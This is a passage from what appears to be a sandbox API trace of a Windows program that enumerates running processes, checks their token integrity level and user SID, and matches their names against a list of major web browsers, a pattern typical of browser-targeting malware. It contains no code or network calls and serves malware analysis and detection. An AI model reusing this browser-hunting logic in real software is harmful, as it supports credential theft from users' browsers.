dwMinorVersion=0x2d7840, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.058] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.058] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.058] GetLastError () returned 0x7a [0218.058] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.058] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.058] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.058] CloseHandle (hObject=0x36c) returned 1 [0218.059] CloseHandle (hObject=0x374) returned 1 [0218.059] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0218.059] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0218.059] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0218.059] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0218.059] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0218.059] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0218.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x374 [0218.059] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.059] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.059] GetLastError () returned 0x7a [0218.059] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.059] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.059] CloseHandle (hObject=0x36c) returned 1 [0218.059] CloseHandle (hObject=0x374) returned 1 [0218.059] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.059] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0x374 [0218.059] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7990, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.059] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.059] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.059] GetLastError () returned 0x7a [0218.059] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.059] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.059] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.059] CloseHandle (hObject=0x36c) returned 1 [0218.059] CloseHandle (hObject=0x374) returned 1 [0218.059] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0218.059] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0218.059] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0218.060] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0218.060] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0218.060] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0218.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x374 [0218.060] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.060] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.060] GetLastError () returned 0x7a [0218.060] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.060] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.060] CloseHandle (hObject=0x36c) returned 1 [0218.060] CloseHandle (hObject=0x374) returned 1 [0218.060] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0x374 [0218.060] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7b08, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.060] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.060] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.060] GetLastError () returned 0x7a [0218.060] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.060] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.060] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.060] CloseHandle (hObject=0x36c) returned 1 [0218.060] CloseHandle (hObject=0x374) returned 1 [0218.060] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.060] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.060] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.060] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.060] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.060] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0218.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x374 [0218.060] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.060] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.060] GetLastError () returned 0x7a [0218.060] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.060] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.060] CloseHandle (hObject=0x36c) returned 1 [0218.061] CloseHandle (hObject=0x374) returned 1 [0218.061] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0x374 [0218.061] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7c78, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.061] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.061] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.061] GetLastError () returned 0x7a [0218.061] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.061] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.061] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.061] CloseHandle (hObject=0x36c) returned 1 [0218.061] CloseHandle (hObject=0x374) returned 1 [0218.061] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0218.061] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0218.061] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0218.061] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0218.061] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0218.061] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0218.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x374 [0218.061] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.061] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.061] GetLastError () returned 0x7a [0218.061] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.061] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.061] CloseHandle (hObject=0x36c) returned 1 [0218.061] CloseHandle (hObject=0x374) returned 1 [0218.061] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.061] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0x374 [0218.061] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7df8, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.061] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.061] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.061] GetLastError () returned 0x7a [0218.061] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.061] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.061] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.062] CloseHandle (hObject=0x36c) returned 1 [0218.062] CloseHandle (hObject=0x374) returned 1 [0218.062] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0218.062] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0218.062] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0218.062] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0218.062] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0218.062] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0218.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x374 [0218.062] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.062] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.062] GetLastError () returned 0x7a [0218.062] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.062] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.062] CloseHandle (hObject=0x36c) returned 1 [0218.062] CloseHandle (hObject=0x374) returned 1 [0218.062] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0x374 [0218.062] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d7f50, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.062] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.062] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.062] GetLastError () returned 0x7a [0218.062] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.062] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.062] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.062] CloseHandle (hObject=0x36c) returned 1 [0218.062] CloseHandle (hObject=0x374) returned 1 [0218.062] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0218.062] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0218.063] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0218.063] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0218.063] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0218.063] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0218.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x374 [0218.063] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.063] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.063] GetLastError () returned 0x7a [0218.063] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.063] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.063] CloseHandle (hObject=0x36c) returned 1 [0218.063] CloseHandle (hObject=0x374) returned 1 [0218.063] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0x374 [0218.063] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d80a0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.063] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.063] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.063] GetLastError () returned 0x7a [0218.063] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.063] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.063] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.063] CloseHandle (hObject=0x36c) returned 1 [0218.063] CloseHandle (hObject=0x374) returned 1 [0218.063] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0218.063] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0218.064] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0218.064] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0218.064] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0218.064] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0218.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x374 [0218.064] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x8, TokenHandle=0xfcfaa4 | out: TokenHandle=0xfcfaa4*=0x36c) returned 1 [0218.064] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfa8c | out: TokenInformation=0x0, ReturnLength=0xfcfa8c) returned 0 [0218.064] GetLastError () returned 0x7a [0218.064] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0xedc4a0, TokenInformationLength=0x24, ReturnLength=0xfcfa8c | out: TokenInformation=0xedc4a0, ReturnLength=0xfcfa8c) returned 1 [0218.064] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0xc, TokenInformation=0xfcfabc, TokenInformationLength=0x4, ReturnLength=0xfcfaa0 | out: TokenInformation=0xfcfabc, ReturnLength=0xfcfaa0) returned 1 [0218.064] CloseHandle (hObject=0x36c) returned 1 [0218.064] CloseHandle (hObject=0x374) returned 1 [0218.064] GetLengthSid (pSid=0xedc4a8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0218.064] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0x374 [0218.064] GetVersionExW (in: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x80, dwMinorVersion=0x2d81f0, dwBuildNumber=0xc800844c, dwPlatformId=0xf0d330, szCSDVersion="\x01") | out: lpVersionInformation=0xfcf990*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0218.064] OpenProcessToken (in: ProcessHandle=0x374, DesiredAccess=0x20008, TokenHandle=0xfcfabc | out: TokenHandle=0xfcfabc*=0x36c) returned 1 [0218.064] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xfcfab8 | out: TokenInformation=0x0, ReturnLength=0xfcfab8) returned 0 [0218.064] GetLastError () returned 0x7a [0218.064] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x19, TokenInformation=0xedbb70, TokenInformationLength=0x14, ReturnLength=0xfcfab8 | out: TokenInformation=0xedbb70, ReturnLength=0xfcfab8) returned 1 [0218.064] GetSidSubAuthorityCount (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0xedbb79 [0218.064] GetSidSubAuthority (pSid=0xedbb78*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0xedbb80 [0218.064] CloseHandle (hObject=0x36c) returned 1 [0218.065] CloseHandle (hObject=0x374) returned 1 [0218.065] lstrcmpiW 